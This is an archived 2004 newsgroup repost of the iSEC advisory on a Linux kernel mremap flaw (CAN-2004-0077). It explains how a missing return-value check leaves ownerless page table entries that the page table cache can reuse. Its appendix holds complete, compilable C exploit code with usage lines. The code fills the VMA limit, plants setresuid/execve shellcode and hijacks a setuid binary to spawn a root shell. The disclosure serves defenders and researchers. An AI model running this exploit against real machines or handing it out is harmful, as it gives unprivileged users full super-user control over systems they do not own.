Kernel Vulnerability

From: Keith (kilo_watt_radio_at_earthlink.net.SPAM-31727)
Date: 03/07/04

  • Next message: Keith: "Kernel Vulnerability"
    Date: Sun, 07 Mar 2004 16:28:24 -0000
    
    

    Followup-To: comp.os.linux.security

    Synopsis: Linux kernel do_mremap VMA limit local privilege escalation
               vulnerability
    Product: Linux kernel
    Version: 2.2 up to and including 2.2.25, 2.4 up to to and including 2.4.24,
               2.6 up to to and including 2.6.2
    Vendor: http://www.kernel.org/
    URL: http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
    CVE: CAN-2004-0077
    Author: Paul Starzetz <ihaquer@isec.pl>
    Date: March 1, 2004

    Issue:
    ======

    A critical security vulnerability has been found in the Linux kernel memory
    management code inside the mremap(2) system call due to missing function return
    value check. This bug is completely unrelated to the mremap bug disclosed on
    05-01-2004 except concerning the same internal kernel function code.

    Details:
    ========

    The Linux kernel manages a list of user addressable valid memory locations on a
    per process basis. Every process owns a single linked list of so called virtual
    memory area descriptors (called from now on just VMAs). Every VMA describes the
    start of a valid memory region, its length and moreover various memory flags
    like page protection.

    Every VMA in the list corresponds to a part of the process's page table. The
    page table contains descriptors (in short page table entries PTEs) of physical
    memory pages seen by the process. The VMA descriptor can be thus understood as a
    high level description of a particular region of the process's page table
    storing PTE properties like page R/W flag and so on.

    The mremap() system call provides resizing (shrinking or growing) as well as
    moving of existing virtual memory areas or any of its parts across process's
    addressable space.

    Moving a part of the virtual memory from inside a VMA area to a new location
    requires creation of a new VMA descriptor as well as copying the underlying page
    table entries described by the VMA from the old to the new location in the
    process's page table.

    To accomplish this task the do_mremap code calls the do_munmap() internal kernel
    function to remove any potentially existing old memory mapping in the new
    location as well as to remove the old virtual memory mapping. Unfortunately the
    code doesn't test the return value of the do_munmap() function which may fail if
    the maximum number of available VMA descriptors has been exceeded. This happens
    if one tries to unmap middle part of an existing memory mapping and the
    process's limit on the number of VMAs has been reached (which is currently
    65535).

    One of the possible situations can be illustrated with the following picture.
    The corresponding page table entries (PTEs) have been marked with o and x:

    Before mremap():

    (oooooooooooooooooooooooo) (xxxxxxxxxxxx)
    [----------VMA1----------] [----VMA2----]
          [REMAPPED-VMA] <---------------|

    After mremap() without VMA limit:

    (oooo)(xxxxxxxxxxxx)(oooo)
    [VMA3][REMAPPED-VMA][VMA4]

    After mremap() but VMA limit:

    (ooooxxxxxxxxxxxxxxoooo)
    [---------VMA1---------]
         [REMAPPED-VMA]

    After the maximum number of VMAs in the process's VMA list has been reached
    do_munmap() will refuse to create the necessary VMA hole because it would split
    the original VMA in two disjoint VMA areas exceeding the VMA descriptor limit.

    Due to the missing return value check after trying to unmap the middle of the
    VMA1 (this is the first invocation of do_munmap inside do_mremap code) the
    corresponding page table entries from VMA2 are still inserted into the page
    table location described by VMA1 thus being subject to VMA1 page protection
    flags. It must be also mentioned that the original PTEs in the VMA1 are lost
    thus leaving the corresponding page frames unusable for ever.

    The kernel also tries to insert the overlapping VMA area into the VMA descriptor
    list but this fails due to further checks in the low level VMA manipulation
    code. The low level VMA list check in the 2.4 and 2.6 kernel versions just call
    BUG() therefore terminating the malicious process.

    There are also two other unchecked calls to do_munmap() inside the do_mremap()
    code and we believe that the second occurrence of unchecked do_munmap is also
    exploitable. The second occurrence takes place if the VMA to be remapped is
    beeing truncated in place. Note that do_munmap can also fail on an exceptional
    low memory condition while trying to allocate a VMA descriptor.

    Exploitation:
    =============

    The vulnerability turned out to be very easily exploitable. Our first guess was
    to move PTEs from one VMA mapping a read-only file (like /etc/passwd) to another
    writeable VMA. This approach failed because after the BUG() macro has been
    invoked the mmap semaphore of the memory descriptor is left in a closed (that is
    down_write()) state thus preventing any further memory operations which acquire
    the semaphore in other clone threads.

    So our attention came over the page table cache code which was introduced early
    in the 2.4 series but not enabled by default. Kernels later than the 2.4.19
    enable the page table cache. The basic idea of a page table cache is to keep
    free page frames recently used for the page tables in a linked list to speed up
    the allocation of new page tables.

    On Linux every process owns a reference to a memory descriptor (mm_struct) which
    contains a pointer to a page directory. The page directory is a single page
    frame (we describe the 4kb sized pages case without PAE) containing 1024
    pointers to the page tables. A single page table page on the i386 architecture
    holds 1024 PTEs describing up to 4MB of process's virtual memory. A single PTE
    contains the physical address of the page mapped at the PTE's virtual address
    and the page access rights.

    The page tables are allocated on demand if a page fault occurs. They are also
    freed and the corresponding page frames released to the memory manager if a
    process unmaps parts of its virtual memory spanning at least one page table page
    that is a region containing at least a 4MB sized and 4MB aligned memory area.

    There are two paths if a new page table must be allocated: the slow and the fast
    one. The fast path takes one page from the head of the page table cache while
    the slow one just calls get_free_page(). This works well if the pages from the
    page table cache have been properly cleared before inserting them into the
    cache. Normally the page tables are cleared by zap_page_range() which is called
    from do_munmap. It is very important for the proper operation of the Linux
    memory management that all locations of the process's page table actually
    containing a valid PTE are covered by the corresponding VMA descriptor.

    In the case of the unchecked do_munmap inside the mremap code we have found a
    condition leaving a part of the page table uncovered by a VMA. The offending
    code is:

    [269] if (old_len >= new_len) {
                    do_munmap(current->mm, addr+new_len, old_len - new_len);
                    if (!(flags & MREMAP_FIXED) || (new_addr == addr))
                            goto out;
            }

    This piece of code is responsible for truncating the VMA the user wants to remap
    in place. It can be easily seen that do_munmap will fail if [addr+new_len,
    addr+new_len + (old_len-new_len)] goes into the middle of a VMA and the maximum
    number of allowed VMA descriptors has been already used by the process. That
    means also that the page table will still contain valid PTEs from addr+new_len
    on. Later in the mremap code a part of the corresponding VMA is moved and
    truncated:

    [179] if (!move_page_tables(current->mm, new_addr, addr, old_len)) {
                    unsigned long vm_locked = vma->vm_flags & VM_LOCKED;

                    if (allocated_vma) {
                            *new_vma = *vma;
                            new_vma->vm_start = new_addr;
                            new_vma->vm_end = new_addr+new_len;
                            new_vma->vm_pgoff += (addr-vma->vm_start) >> PAGE_SHIFT;

    but more PTEs (namely old_len) than the length of the created VMA are moved from
    the old location if a new location has been specified along with the
    MREMAP_MAYMOVE flag. This works well only if the previous do_munmap did not
    fail. This situation can be illustrated as follows:

    before mremap:

           <-- old_len -->
    (oooooooooooooooooooooooooooo)
    [------|-----VMA1-----|------]
                |---------------------------------> new_addr

    after mremap, no VMA limit:
                                                    new_len
    (oooooo) (oooooo) (oooooo)
    [-VMA1-] [-VMA3-] [-VMA2-]

    after mremap but VMA limit:
                                                    new_len [*]
    (oooooo oooooo) (oooooo)ooooooooo
    [-----------VMA1-------------] [-VMA2-]

    Those [*] 'ownerless' PTE entries in the page table can be further exploited
    since the memory manager has lost track of them. If the process now unmaps a
    sufficiently big area of memory covering those ownerless PTEs, the underlying
    page table frame will be inserted into the page table cache but will still
    contain valid PTEs. That means that on the next page table frame allocation
    inside process P for an address A our PTEs will appear in the page table of the
    process P! If that process tries to access the virtual memory at the address A
    there won't be also a page fault if the PTEs have appropriate (read or write)
    access rights. In other words: through the page table cache we are able to
    insert any data into the virtual memory space of another process.

    Our code takes the way through a setuid binary, however this is not the only one
    possibility. We prepare the page table cache so that there is a single empty
    page frame in front of the cache and then a special page table containing 'self
    executing' pages. To fully understand how it works we must dig into the execve()
    system call.

    If an user calls execve() the kernel removes all traces of the current
    executable including the virtual memory areas and page tables allocated to the
    process. Then a new VMA for the stack on top of the virtual memory is created
    where the program environment and arguments to the new binary are stored (they
    have been preserved in kernel memory). This causes a first page table frame to
    be allocated for the virtual memory region ranging from 0xbfc00000-0xc0000000.

    As next the .text and .data sections of the binary to be executed as well as the
    program interpreter responsible for further loading are mapped into the fresh
    virtual memory space. For the ELF linking format this is usually the ld.so
    dynamic linker. At this point the kernel does not allocate the underlying page
    tables. Only VMA descriptors are inserted into the process's VMA list.

    After doing some more work not important for the following the kernel transfers
    control to the dynamic linker to execute the binary. This causes a second page
    fault and triggers demand loading of the first code page of the dynamic linker.
    On a standard Linux kernel this will also allocate a page frame for the page
    table ranging from 0x40000000 to 0x40400000.

    On a kernel with page table cache enabled both allocations will take page frames
    from the cache first. That means that if the second page in the cached page list
    contains valid PTEs those could appear instead of the regular dynamic linker
    code. It is easy to place the PTEs so that they will shadow the code section of
    the dynamic linker. Note that the first PTE entry of a page is used by the cache
    code to maintain the page list. In our code we populate the page table cache
    with special frames containing PTEs to pages with a short shell code at the end
    of the page and fill the pages with a NOP landing zone.

    We must also mention that the first mremap hole disclosed on 05-01-2004 can be
    also very easily exploited through the page table cache. Details are left for
    the skilled reader.

    A second possibility to exploit the mremap bug is to create another VMA covering
    ownerless PTEs from a read-only file like /etc/passwd.

    Impact:
    =======

    Since no special privileges are required to use the mremap(2) system call any
    process may use its unexpected behavior to disrupt the kernel memory management
    subsystem.

    Proper exploitation of this vulnerability leads to local privilege escalation
    giving an attacker full super-user privileges. The vulnerability may also lead
    to a denial-of-service attack on the available system memory.

    Tested and known to be vulnerable kernel versions are all <= 2.2.25, <= 2.4.24
    and <= 2.6.2. The 2.2.25 version of Linux kernel does not recognize the
    MREMAP_FIXED flag but this does not prevent the bug from being successfully
    exploited. All users are encouraged to patch all vulnerable systems as soon as
    appropriate vendor patches are released. There is no hotfix for this
    vulnerability. Limited per user virtual memory still permits do_munmap() to
    fail.

    Credits:
    ========

    Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and performed
    further research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION
    PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS.

    Disclaimer:
    ===========

    This document and all the information it contains are provided "as is", for
    educational purposes only, without warranty of any kind, whether express or
    implied.

    The authors reserve the right not to be responsible for the topicality,
    correctness, completeness or quality of the information provided in this
    document. Liability claims regarding damage caused by the use of any information
    provided, including any kind of information which is incomplete or incorrect,
    will therefore be rejected.

    Appendix:
    =========

    /*
     *
     * mremap missing do_munmap return check kernel exploit
     *
     * gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
     * ./mremap_pte [suid] [[shell]]
     *
     * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
     *
     * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
     * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
     * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <unistd.h>
    #include <syscall.h>
    #include <signal.h>
    #include <time.h>
    #include <sched.h>

    #include <sys/mman.h>
    #include <sys/wait.h>
    #include <sys/utsname.h>

    #include <asm/page.h>

    #define str(s) #s
    #define xstr(s) str(s)

    // this is for standard kernels with 3/1 split
    #define STARTADDR 0x40000000
    #define PGD_SIZE (PAGE_SIZE * 1024)
    #define VICTIM (STARTADDR + PGD_SIZE)
    #define MMAP_BASE (STARTADDR + 3*PGD_SIZE)

    #define DSIGNAL SIGCHLD
    #define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)

    #define MREMAP_MAYMOVE ( (1UL) << 0 )
    #define MREMAP_FIXED ( (1UL) << 1 )

    #define __NR_sys_mremap __NR_mremap

    // how many ld.so pages? this is the .text section length (like from cat
    // /proc/self/maps) in pages
    #define LINKERPAGES 0x14

    // suid victim
    static char *suid="/bin/ping";

    // shell to start
    static char *launch="/bin/bash";

    _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
              ulong, e);
    unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
                             unsigned long new_len, unsigned long flags,
                             unsigned long new_addr);

    static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
    static int i, pid=0;
    static char *env[2], *argv[2];
    static ulong ret;

    // code to appear inside the suid image
    static void suid_code(void)
    {
    __asm__(
            " call callme \n"

    // setresuid(0, 0, 0), setresgid(0, 0, 0)
            "jumpme: xorl %ebx, %ebx \n"
            " xorl %ecx, %ecx \n"
            " xorl %edx, %edx \n"
            " xorl %eax, %eax \n"
            " mov $"xstr(__NR_setresuid)", %al \n"
            " int $0x80 \n"
            " mov $"xstr(__NR_setresgid)", %al \n"
            " int $0x80 \n"

    // execve(launch)
            " popl %ebx \n"
            " andl $0xfffff000, %ebx \n"
            " xorl %eax, %eax \n"
            " pushl %eax \n"
            " movl %esp, %edx \n"
            " pushl %ebx \n"
            " movl %esp, %ecx \n"
            " mov $"xstr(__NR_execve)", %al \n"
            " int $0x80 \n"

    // exit
            " xorl %eax, %eax \n"
            " mov $"xstr(__NR_exit)", %al \n"
            " int $0x80 \n"

            "callme: jmp jumpme \n"
            );
    }

    static int suid_code_end(int v)
    {
    return v+1;
    }

    static inline void get_esp(void)
    {
    __asm__(
            " movl %%esp, %%eax \n"
            " andl $0xfffff000, %%eax \n"
            " movl %%eax, %0 \n"
            : : "m"(old_esp)
            );
    }

    static inline void cloneme(void)
    {
    __asm__(
            " pusha \n"
            " movl $("xstr(CLONEFL)"), %%ebx \n"
            " movl %%esp, %%ecx \n"
            " movl $"xstr(__NR_clone)", %%eax \n"
            " int $0x80 \n"
            " movl %%eax, %0 \n"
            " popa \n"
            : : "m"(pid)
            );
    }

    static inline void my_execve(void)
    {
    __asm__(
            " movl %1, %%ebx \n"
            " movl %2, %%ecx \n"
            " movl %3, %%edx \n"
            " movl $"xstr(__NR_execve)", %%eax \n"
            " int $0x80 \n"
            : "=a"(ret)
            : "m"(suid), "m"(argv), "m"(env)
            );
    }

    static inline void pte_populate(unsigned addr)
    {
    unsigned r;
    char *ptr;

            memset((void*)addr, 0x90, PAGE_SIZE);
            r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
            ptr = (void*) (addr + PAGE_SIZE);
            ptr -= r+1;
            memcpy(ptr, suid_code, r);
            memcpy((void*)addr, launch, strlen(launch)+1);
    }

    // hit VMA limit & populate PTEs
    static void exhaust(void)
    {
    // mmap PTE donor
            t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,
                      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
            if(MAP_FAILED==t)
                    goto failed;

    // prepare shell code pages
            for(i=2; i<LINKERPAGES+1; i++)
                    pte_populate(victim + PAGE_SIZE*i);
            i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);
            if(i)
                    goto failed;

    // lock unmap
            base = MMAP_BASE;
            cnt = 0;
            prot = PROT_READ;
            printf("\n"); fflush(stdout);
            for(;;) {
                    t = mmap((void*)base, PAGE_SIZE, prot,
                             MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
                    if(MAP_FAILED==t) {
                            if(ENOMEM==errno)
                                    break;
                            else
                                    goto failed;
                    }
                    if( !(cnt%512) || cnt>65520 )
                            printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,
                            base+PAGE_SIZE); fflush(stdout);
                    base += PAGE_SIZE;
                    prot ^= PROT_EXEC;
                    cnt++;
            }

    // move PTEs & populate page table cache
            ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,
                             MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
            if(-1==ret)
                    goto failed;

            munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
            t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,
                     PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,
                     0);
            if(MAP_FAILED==t)
                    goto failed;

            *t = *((unsigned *)old_esp);
            munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
            printf("\n[+] Success\n\n"); fflush(stdout);
            return;

    failed:
            printf("\n[-] Failed\n"); fflush(stdout);
            _exit(0);
    }

    static inline void check_kver(void)
    {
    static struct utsname un;
    int a=0, b=0, c=0, v=0, e=0, n;

            uname(&un);
            n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);
            if(n!=3 || a!=2) {
                    printf("\n[-] invalid kernel version string\n");
                    _exit(0);
            }

            if(b==2) {
                    if(c<=25)
                            v=1;
            }
            else if(b==3) {
                    if(c<=99)
                            v=1;
            }
            else if(b==4) {
                    if(c>18 && c<=24)
                            v=1, e=1;
                    else if(c>24)
                            v=0, e=0;
                    else
                            v=1, e=0;
            }
            else if(b==5 && c<=75)
                    v=1, e=1;
            else if(b==6 && c<=2)
                    v=1, e=1;

            printf("\n[+] kernel %s vulnerable: %s exploitable %s",
                    un.release, v? "YES" : "NO", e? "YES" : "NO" );
            fflush(stdout);

            if(v && e)
                    return;
            _exit(0);
    }

    int main(int ac, char **av)
    {
    // prepare
            check_kver();
            memset(env, 0, sizeof(env));
            memset(argv, 0, sizeof(argv));
            if(ac>1) suid=av[1];
            if(ac>2) launch=av[2];
            argv[0] = suid;
            get_esp();

    // mmap & clone & execve
            exhaust();
            cloneme();
            if(!pid) {
                    my_execve();
            } else {
                    waitpid(pid, 0, 0);
            }

    return 0;
    }

    -- 
    Best Regards,  Keith
    NW Oregon Radio http://kilowatt-radio.org/
    http://linux.com http://freebsd.org http://apple.com
    Pax melior est quam iustissimum bellum.
    

  • Next message: Keith: "Kernel Vulnerability"

    Relevant Pages

    • [UNIX] Linux Kernel do_mremap VMA Limit Local Privilege Escalation (Technical Details)
      ... The Linux kernel manages a list of user addressable valid memory locations ... Every VMA in the list corresponds to a part of the process's page table. ... The page table contains descriptors (in short page table entries PTEs) of ... So our attention came over the page table cache code which was introduced ...
      (Securiteam)
    • [Full-Disclosure] Re: Second critical mremap() bug found in all Linux kernels
      ... > A critical security vulnerability has been found in the Linux kernel ... > memory management code inside the mremapsystem call due to missing ... > Every VMA in the list corresponds to a part of the process's page table. ...
      (Full-Disclosure)
    • Re: Second critical mremap() bug found in all Linux kernels
      ... > A critical security vulnerability has been found in the Linux kernel ... > memory management code inside the mremapsystem call due to missing ... > Every VMA in the list corresponds to a part of the process's page table. ...
      (Bugtraq)
    • Re: Second critical mremap() bug found in all Linux kernels
      ... > A critical security vulnerability has been found in the Linux kernel ... > memory management code inside the mremapsystem call due to missing ... > Every VMA in the list corresponds to a part of the process's page table. ...
      (Full-Disclosure)
    • mremap(2) full details available
      ... Linux kernel do_mremap VMA limit local privilege escalation ... A critical security vulnerability has been found in the Linux kernel memory ... The corresponding page table entries (PTEs) have been marked with o and x: ...
      (Bugtraq)